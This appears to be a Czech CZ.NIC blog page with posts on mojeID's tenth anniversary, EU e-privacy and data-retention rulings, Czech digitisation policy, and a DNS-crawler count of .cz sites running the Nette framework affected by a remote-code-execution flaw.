Povedlo se! První signály směřující k naplnění počáteční vize mojeID se dostavily. A i když šlo zpočátku o víceméně nesmělé pokusy o využití ověřených identit, bylo to pro nás potvrzením, že jsme se vydali správným směrem – i když o pár let dříve, než z toho mohl kdokoli reálně profitovat.

To lepší nás stále ještě čeká

MojeID má dnes téměř 700 tisíc uživatelů. Kromě e-shopů, médií a komunitních webů našlo své uplatnění také například v knihovních rezervačních systémech, na portálech měst a obcí a v celé řadě dalších internetových služeb.

Předčasným dárkem k 10. narozeninám bylo letošní získání akreditace Ministerstva vnitra pro správu kvalifikovaného systému elektronické identifikace. To ve stručnosti znamená, že mojeID je nyní státem uznaným „identity providerem“. Všem uživatelům mojeID to umožňuje snadno přistupovat k online službám státu, a zároveň mít svoji identitu ověřenou přes veřejné registry a tak připravenou k použití u kterékoli komerční služby, která tento pohodlný způsob správy identit implementuje.

Jestliže prvních deset let mojeID byla neskutečná jízda, nedovedu si ani představit, co všechno nás s mojeID čeká v dekádě následující. Do dalších let přeji mojeID vše nejlepší a je mi nesmírnou ctí, že jsem před deseti lety dostal tu šanci být u toho, když se utváří infrastruktura českého Internetu.

Kategorie:

Krátké vlny (díl 7.) – Digitalizací proti korupci, derogace e-privacy směrnice a mojeID návody

Čt, 10/22/2020 - 09:35

„Výhodou krátkých vln je způsob jejich šíření v atmosféře – díky mnohonásobným odrazům, k nimž dochází na ionizovaných částicích ve vyšších vrstvách (ionosféra), není nutná přímá dohlednost mezi vysílačem a přijímačem, takže jejich vzájemná vzdálenost může dosáhnout i tisíců až desítek tisíc kilometrů. Slabinou jsou naopak nestabilní podmínky šíření. Prostřednictvím krátkých vln se často vysílají zahraniční programy rozhlasových stanic do zemí, kde je omezená svoboda projevu nebo kde je zavedena cenzura.“ (zdroj: Wikipedia)

Z médií se dozvídáme, jak úžasná bude (nebo už je?) nová bankovní identitu (BankID), ale zdá se, alespoň podle laického pohledu zvenčí, že BankID má svůj Prima CNN moment – ve chvíli, kdy by ji Češi ocenili nejvíce (omezování úředních hodin, snaha vyhnout se frontám na úřadech) neexistuje a jen slýcháme chvalozpěvy, jak nám bude hezky, až tu bude. Naštěstí tu uživatel má možnost výběru, ačkoliv o tom někteří představitelé státu vůbec nemluví (například projev pana premiéra Babiše na konferenci Digitální Česko), a mohou sáhnout po mojeID. Pokud zatím nemáte nebo nepotřebujete FIDO2 token, můžete snadno využít FIDO2 platformový identifikátor z Windows Hello nebo Androidu – návod je přehledný a jednoduchý. #smojeIDtozvladneme

Dne 10. září předložila Evropská komise návrh dočasné derogace směrnice o soukromí a elektronických komunikacích (stará známá e-Privacy) za účelem boje proti pohlavnímu zneužívání dětí. Směrnice e-privacy zajišťuje ochranu soukromého života, důvěrnost komunikací a osobních údajů v odvětví elektronických komunikací. Podle Evropské komise neobsahuje tato směrnice výslovný právní základ pro dobrovolné zpracování obsahu nebo provozních údajů za účelem odhalování sexuálního zneužívání dětí online, zatímco některé moderní komunikační služby již používají „specifické technologie“ ke zjišťování sexuálního zneužívání dětí při využívání jejich služeb a reportování k orgánům činným v trestním řízení.

Tato dobrovolná opatření přijatá poskytovateli služeb však podle Evropské komise odporují e-privacy směrnici. Vzhledem k tomu, že neexistují žádné konkrétní právní předpisy upravující tuto problematiku, „Komise se domnívá, že je nezbytné přijmout okamžitá opatření“ ve formě nařízení. Žádná veřejná konzultace, žádné posouzení dopadů před vlastní regulací podle Komise z důvodu „časově citlivé povahy problému“ považovány za nutné.

Nicméně dne 30. září Evropská komise na rozdíl od dřívějšího prohlášení zveřejnila veřejnou konzultaci k návrhu prozatímního nařízení. Prozatímní nařízení má být účinné od 21. prosince 2020 do 31. prosince 2025. Do druhého čtvrtletí roku 2021 má Komise navrhnout další legislativní nástroj, který by vyžadoval, aby „příslušní poskytovatelé online služeb odhalili známý materiál o pohlavním zneužívání dětí a uložili jim oznamovací povinnost vůči orgánům veřejné správy“. Aby bylo navrhované nařízení účinné od zamýšleného data v prosinci 2020, musí být předem schváleno Evropským parlamentem a Radou EU.

V České republice je zneužití dítěte k výrobě pornografie pod oznamovací povinností, resp. neoznámení je trestným činem podle § 368 trestního zákoníku.

Ale nemusí se jednat v první řadě „jen“ o úmyslnou trestnou činnost. Kolegové ze sdružení CZ.NIC, kteří mají na starost linku STOPonline.cz se na Internetu často setkávají s fotografiemi, které tam nepatří; pořídí je buď pyšní rodiče nebo přátelé a ti je potom bez vědomí a souhlasu osob, kterých se bezprostředně týkají, zveřejní, přičemž si neuvědomí, že právě tyto fotografie mohou být cíleně zneužité. S tím také souvisí hlášení takovéhoto nevhodného obsahu, kterého bylo loni téměř čtyři tisíce. Proto se kolegové ze STOPonline.cz rozhodli spustit kampaň „Dětská nahota na Internet nepatří“, jejímiž cíli jsou především prosazovat respektování soukromí ostatních a dodržování pravidel bezpečného chování na Internetu.

Dne 30. září zveřejnila Evropská komise svou zprávu „2020 Rule of Law Report“ (zprávu o právním státu), která hodnotí situaci nezávislosti soudnictví v celé EU. Zpráva také zdůrazňuje výzvy, kterým soudnictví čelilo během jarní pandemie COVID-19. Například uvádí, že „pandemie COVID-19 dále zdůraznila význam digitalizace soudních systémů“. Zpráva rovněž zdůrazňuje riziko zvýšených obav o právní stát v případě „nadměrného používání zrychlených a mimořádných právních předpisů“.

Pozitivní je, že podle zprávy „reakce na krizi ukázaly celkově silnou odolnost v národních systémech“. Zpráva rovněž zmiňuje existenci kontrol ex post ve vztahu k mimořádným zákonům přijímaných v reakci na boj s pandemií v nouzových stavech. Zpráva má ambici být prvním krokem v plánech Evropské komise „k posílení společného chápání právního státu v EU“ a jako základ pro další interinstitucionální práci s Evropským parlamentem a členskými státy. Analýzu konkrétních členských států EU a jejich soudních systémů naleznete zde. Pokud Vás zajímá pouze Česká republika, klikněte zde.

Tak nám odvolali předsedu Úřadu na ochranu hospodářské soutěže. Teda neodvolali. On rezignoval (k 1. prosinci 2020). Ale kdyby nerezignoval, byl by odvolán. Vláda na posledním zasedání ustanovila výběrovou komisi (v počtu 3 členů) a schválila podmínky výběrového řízení. Povinnými požadavky je státní občanství ČR, vysokoškolské vzdělání v magisterském studijním programu právního nebo ekonomického zaměření, minimálně 5 let v řídící funkci v posledních 15 letech – z toho alespoň 1 rok ve 2. stupni řízení, odborná praxe nejméně 5 let v oblasti hospodářské soutěže nebo zadávání veřejných zakázek, znalost anglického jazyka na komunikativní úrovni, zpracování písemné práce (8 normostran max) na téma „Koncepce Úřadu pro hospodářskou soutěž v krátkodobém (1 rok) a dlouhodobém horizontu (3 a více let)“, bezúhonnost, pokud jste starší ročník (narozený/ná do 1. prosince 1971) doklad o lustračním osvědčení a…a tady je drobný zakopaný psíček – prověrka na stupeň D (jako důvěrné). Jak trefně poznamenal bývalý první místopředseda Robert Neruda na Twitteru, touto podmínkou je v podstatě vyloučen zástupce ze soukromého sektoru. Očekávaný nástup? 1. prosince 2020. Postup podle hesla, co se na Hradě uvaří, to se doma také sní…

Na svém dalším zasedání má vláda přijmout informaci o Projektu digitalizace stavebního řízení a územního plánování. Odhadované celkové výdaje na realizaci projektu – část zavedení soustavy centrálních informačních systémů digitalizace stavebního řízení a územního plánování – jsou ve výši 1,2197 mld. Kč. Bez posílených lidských zdrojů, bez výdajů na provoz služeb pro předběžná řešení. Tak uvidíme, jak se odhady naplní.

Digitalizace stavebního řízení nejen zabezpečení účinný a efektivní systém, který pro stavební úřady zkoncentruje veškeré úkony, které jsou roztříštěny, zjednoduší získávání podkladů, zavede formuláře atd. atd., ale slovy předkladatele „ve svém důsledku to bude významné protikorupční opatření a omezení netransparentních zásahů do stavebního řízení.“ Digitalizací proti korupci. To je jistě skvělé heslo do volební kampaně (nezačala už?), obávám se ale, takový informační systém, který by zastavil českého korupčníka ještě nevybudovali. A když se podíváte na rekodifikaci stavebního práva, který vláda poslala do Poslanecké sněmovny, tak… no nic, skončeme pozitivně – literární doporučení se tentokrát bude týkat oddychové literatury. Frederick Forsyth, legenda špionážní prózy, se vrátil na český tuzemský trh s knihou Liška. Hodný hacker s brilantním mozkem, který hravě překonává zdánlivě neproniknutelné firewally jako hlavní postava, kolem které se točí akce hodných a zlých agentů. Ano, je to pohádka, ale i dospělí si občas pohádku zaslouží a Frederick Forsyth je zárukou, že se tři hodiny nebudete nudit (ani v karanténě). #staytuned

Kategorie:

Zranitelnost frameworku Nette se může týkat tisíců .CZ domén, odhalil DNS Crawler

Po, 10/19/2020 - 09:21

Na začátku června jsme v rámci projektu ADAM spustili nástroj DNS crawler, který periodicky prochází domény druhé úrovně pod TLD .cz, sbírá data z DNS, webových a mailových serverů a umožňuje nám získaná data analyzovat. Dnes bychom vás rádi seznámili s jedním z výstupů této aktivity, která přispěje celkové bezpečnosti českého Internetu.

Před dvěma týdny byla zveřejněna informace o závažné zranitelnosti (CVE-2020–15227) populárního webového PHP frameworku Nette, která může potenciálnímu útočníkovi umožnit tzv. vzdálené spuštění kódu (remote code execution), což je jeden z nejrizikovějších typů zranitelností a může vést až k převzetí kontroly nad serverem. Protože se tato zranitelnost nachází právě v kódu samotného frameworku, který je hojně využiván při tvorbě webových stránek, dotýká se tato zranitelnost opravdu velkého množství webů.

V současné chvíli se nám podařilo skrze data získaná DNS crawlerem identifikovat přes 36 tisíc českých domén, na kterých je dostupný web postaven na Nette frameworku. Bohužel však z těchto dat není možné zjistit konkrétní verzi frameworku. Je tedy velmi pravděpodobné, že ne všech 36 tisíc webů je zranitelností ohroženo a mnohé již byly aktualizovány na některou z opravených verzí. Nicméně z naší zkušenosti víme, že tyto webové technologie obvykle nebývají z různých důvodů pravidelně aktualizovány, někdy i mnoho let. V současnosti tak diskutujeme možnosti identifikace konkrétních webů, které jsou zmíněnou zranitelností ohroženy a možnosti oslovení jejich vlastníků.

Kategorie:

Krátké vlny (díl 6.) – Z výjimky se nesmí učinit pravidlo, tak pravil soud

Čt, 10/08/2020 - 08:23

„Výhodou krátkých vln je způsob jejich šíření v atmosféře – díky mnohonásobným odrazům, k nimž dochází na ionizovaných částicích ve vyšších vrstvách (ionosféra), není nutná přímá dohlednost mezi vysílačem a přijímačem, takže jejich vzájemná vzdálenost může dosáhnout i tisíců až desítek tisíc kilometrů. Slabinou jsou naopak nestabilní podmínky šíření. Prostřednictvím krátkých vln se často vysílají zahraniční programy rozhlasových stanic do zemí, kde je omezená svoboda projevu nebo kde je zavedena cenzura.“ (zdroj: Wikipedia)

Druhá vlna koronaviru nabírá na síle, ale české úřady nepolevují a chrlí „úžasné“ návrhy. Posledně jsem zmínil Ministerstvem vnitra připravený návrh novely zákona o krizovém řízení, která v části druhé mění i zákon o integrovaném záchranném systému a dává pravomoc Ministerstvu vnitra požadovat po Českém telekomunikačním úřadě vyhrazení jakýchkoliv kmitočtů pro jejich účely.

Laicky řečeno, návrh zákona by umožňoval (pokud by byl schválen v navržené podobě), aby Ministerstvo vnitra přišlo za ČTÚ a řeklo:

– „Hele, milé ČTÚ, támhle Vodafonu končí příděl kmitočtů v pásmu 800 MHz, nám by se líbilo, víš, pro ty naše vysílačky, třeba 5 MHz, nebo víš co, dej nám 10 MHz a přidej 10 MHz z 1800 MHz, my si na tom něco postavíme.“

A ČTÚ, přesně podle návrhu zákona, já vím, že to předkladatelé takhle vůbec nezamýšleli, že to mysleli poctivě, ale tak, jak je to napsané, by ČTÚ jen kývlo a řeklo:

– „Jasně, 10 MHz a 10 MHz pro vnitro, pardon, milý Vodafone, já s tím nemůžu nic dělat, musím konat, jak vnitro žádá.“

A to si dejme ruku na srdce, milé vnitro, to asi nebyl zamýšlený cíl, zvláště, když potřeby státu pro poskytování tzv. PPDR služeb mají být zajištěny závazkem spojeným s pásmem 700 MHz, které je v současné době předmětem aukce, kterou organizuje ČTÚ. Ve vyhlášení výběrového řízení jsou stanoveny podmínky k zajištění PPDR komunikace v komerčních mobilních komunikačních sítích 4G/5G využívajících primárně rádiové kmitočty v pásmu 700 MHz, a to jak prostřednictvím závazku národního roamingu, tak prostřednictvím závazku zajištění prioritních BB-PPDR služeb. Za tímto účelem jsou úspěšným účastníkům výběrového řízení ukládána rozsáhlá a velmi nákladná rozvojová kritéria pro pokrytí odlehlých a velmi obtížně dosažitelných lokalit. Pravidla vyhlášeného výběrového řízení byla přitom připravena s ohledem na požadavky Ministerstva vnitra a společně s Ministerstvem vnitra. Shodu na řešení potřeb krizové komunikace pomocí nástrojů v aukci ostatně v minulosti potvrdili veřejně i zástupci Ministerstva vnitra, například v článku „Jak budou komunikovat záchranáři? Řešení se odkládá, Hamáček se stále nedohodl s Babišem.“

Ostatně připomínek k návrhu se sešlo nepočítaně a nadšené z nové povinnosti není ani ČTÚ, když ve svých připomínkách např. píše, že „takový postup není možný bez dalšího jen na základě „požadavku“ Ministerstva vnitra. Připomínáme, že všechny změny plánu využití rádiového spektra je nutno provést řádným způsobem ve správním řízení (vydání opatření obecné povahy) při zohlednění všech aspektů, které v této souvislosti předpokládá zákon č. 127/2005 Sb., o elektronických komunikacích a o změně některých souvisejících zákonů (zákon o elektronických komunikacích), ve znění pozdějších předpisů, včetně provedení veřejné konzultace (§ 130 zákona o elektronických komunikacích).“

Věřme, že „jen“ jedna ruka neví, co dělá druhá.

Nezahálí ani Soudní dvůr Evropské unie (SDEU), který v úterý zveřejnil rozhodnutí ve věci C‑623/17, a které v médiích prosvištělo ve zkratce jako „zrušení plošného ukládání metadat o telekomunikačním provozu uživatelů“. Pojďme si najít trochu času a ponořit se do vlastního rozsudku trochu hlouběji.

Klíčové pro rozhodnutí soudu je současné znění směrnice 2002/58/ES o zpracování osobních údajů a ochraně soukromí v odvětví elektronických komunikací (zkráceně e-privacy). SDEU se drží svého výkladu čl. 15 e-privacy směrnice s tím, že zde sice směrnice umožňuje výjimky z důvěrnosti dat, nicméně jde o výjimku a rozhodně nemá jít o jakousi trvalou výjimku, protože jinak by, logicky, nešlo o výjimku.

Bod 62 rozsudku zdůrazňuje, že kromě práva na soukromí je třeba respektovat i další práva vyplývající z Listiny základních práv EU, jako je právo na ochranu osobních údajů (čl. 8), právo na svobodu projevu (čl. 11). Nicméně články 7, 8 a 11 Charty nejsou absolutní (bod 63, odkazuje se zde na Schremse II). V bodu 66 SDEU zdůrazňuje, že tato základní práva mohou být derogována tehdy, pokud je zajištěno, že tato opatření jsou nezbytná, vhodná a přiměřená v demokratické společnosti, přičemž musí být „strictly“ přiměřené. 

Bod 68 shrnuje, že za účelem vyhovění principu přiměřenosti musí existovat jasná zákonná úprava, která zakotvuje přesná pravidla pro rozsah a aplikaci opatření, včetně ochrany před rizikem zneužití. Úprava na úrovni zákona musí obsahovat jasná pravidla, kdy a za jakých podmínek lze data zpracovávat a musí omezit takový zásah do soukromí pouze na případy, kde je tak nezbytně nutné („strictly necessary“ slovy soudu). Záruky musí být větší zejména v situaci, pokud jsou data zpracovávána automatizovaně.

Bod 69 a to, co vadí SDEU nejvíce – „pokud derogujeme důvěrnost dat tím, že předáváme data bezpečnostním a zpravodajským složkám, nemůžeme tak činit právní úpravou, která tak učiní obecně a bez rozlišení („general and indiscrimainate way“). Z výjimky se totiž učiní pravidlo („it has the effect of making the expeption to the obligation of the principle …the rule“).

Podle bodu 78 musí národní legislativa upravující přístup k datům obsahovat jasná a objektivní pravidla pro stanovení podmínek, za nichž mohou národní orgány k datům přistupovat. Pokud však národní zákony umožňují v podstatě obecné a nerozlišující předávání dat oprávněným orgánům, jedná se plošný přístup k těmto datům (bod 80). A pak taková právní úprava překračuje limit toho, co je „strictly necessary“ a nemůže tak v demokratické společnosti v praxi naplnit podmínky požadované čl. 15 e-privacy směrnice (ve světle čl. 4(2), 7, 8 a 11 Listiny základních práv EU) (bod 81).

SDEU vytrvale říká, že nelze z výjimky udělat pravidlo. A proto je také důležité, zda a v jaké podobě se přijme revize směrnice o e-privacy. Během dosavadního projednávání v Bruselu se některé státy snažily formulaci čl. 15 změnit, Evropská komise se k tomu stavěla zdrženlivě. Na národní úrovni se zřejmě znovu ozvou hlasy, že je nutné data retention zrušit. Doufám, že to bude odborná a nikoliv emotivní debata. Jen při pohledu na trestní zákon a některé skutkové podstaty zjistíte, že bez provozních a lokalizačních údajů nejste prakticky schopni některé trestné činy odhalovat. Pravidlo neuchovávat plošně, tak aby dávalo smysl, je nerealizovatelné. Jakýkoliv opt-out např. pro určité profese (advokáti, novináři) taky nedává větší smysl. Rozsah uchovávaných dat plošný není, je omezen výčtem ve vyhlášce.

Rozhodnutí ve věci C-623/17, byť má nepřímé dopady pro všechny (minimálně v akademických debatách), dopadá na státy sporu. Uvidíme, jak SDEU rozhodne v dalších podobných případech, které mu zatím leží na stole (např. C-739/19 Spacenet, C-140/20 Garda Siochana) . V Česku proběhl přezkum přiměřenosti Ústavním soudem před skoro 10 lety, v jehož důsledku došlo k preciznějšímu stanovení, kdy, za jakých podmínek, lze provozní a lokalizační údaje použít – předat. Díky tomu tento institut „přežil“ druhý přezkum u Ústavního soudu vloni. Ale s pravděpodobností hraničí s jistotou si myslím, že se najdou noví vyzyvatelé.

Z diskuzí na sociálních sítích je člověku někdy ouzko. Snaha vykřičet svou jedinou pravdu pohřbívá i ty nejmenší pokusy o obousměrnou komunikaci a pochopení toho druhého. Nedávno jsem přečetl knížku Jiřího Kratochvíla Liška v dámu a líbil se mi tam trefný popis toho, že tenhle stav, ta snaha rozdělit rodinu, vesnici, stát na 2 rozhádané poloviny, může být chtěný pro dosahování svých vlastních cílů:
– Idea spočívá v tom, že přece celý národ, celá vlast tvoří jakési rodinné společenství. Rusové to moc dobře vědí, když rusky se vlast řekne rodina. Takže zasejme semínka zášti a proradnosti do rodinného společenství celého národa, zasejme je do celý vlasti. A když tak infikujeme celý národ, celou vlast, podlehne pak morálnímu rozkladu, rozpadne se na dvě nepřátelské části, které se potom snadno ovládají. Vždyť moc se zas rusky řekne vlasť.

– Výborně, tomu fandím. A už to vidím: celý národ rozbitý do dvou nepřátelských polovin!“

Ondřej Malý si myslí (a precizně argumentuje), že se nejedná o žádné temné spiknutí, ale že (v tomto případě) Facebook je jenom firma, kterou její neschopný management nedokáže uřídit a nedokáže ani dohlédnout důsledky mnoha svých naprosto sociopatických rozhodnutí.

Knížku pana Kratochvíla i článek ex-kolegy doporučuji, ale proto to sem vlastně nepíšu. Občas jsem si říkal při čekáních na jednání v Poslanecké sněmovně, zda bych měl nějaké téma k diskuzi s tím nebo oním panem poslancem. Zda bych překonal svůj odpor k jeho stranické příslušnosti. A pak při brouzdání Internetem najdu fantastický příspěvek na blogu pana poslance Jiřího Dolejše, kde porovnává dvě kultovní díla filmové science – fiction – Star Trek a Star Wars, a vím že by mě ta diskuze bavila. Protože člověk, který dokáže barvitě popsat svět Star Treku jako komunismu ne nepodobnou utopii („Kritici seriálu vidí jen postavy pobíhající v pyžamovitých uniformách a žijící v idylické utopii ne nepodobné komunismu. Star Trek se ale explicitně nevyjadřuje k politickým ideologiím, jen odráží civilizační optimismus a důvěru v lidský rozum a možnosti logikou řízeného pokroku.“) a Star Wars jako spíše nedemokratický svět postavený na elitách („Budoucnost patří autoritářským imperiím, jejichž temným sklonům dokáže čelit jen magická síla v rukou vyvolených dědičných vůdců.“), musí být, jak říkala moje babička, zábavný společník. Stejně je lepší hledat, i když je to pracné, co nás může spojit (i kdybychom se přitom měli pohádat), než naskakovat na vlnu svých vlastních nezpochybnitelných pravd.

Uzavírám rubriku „doporučuji k přečtení“, beztak se k tématu sociálních sítí a regulace dostaneme při sledování dalších aktivit Evropské komise. A btw, máte radši Star Trek nebo Star Wars?

#staytuned

Kategorie: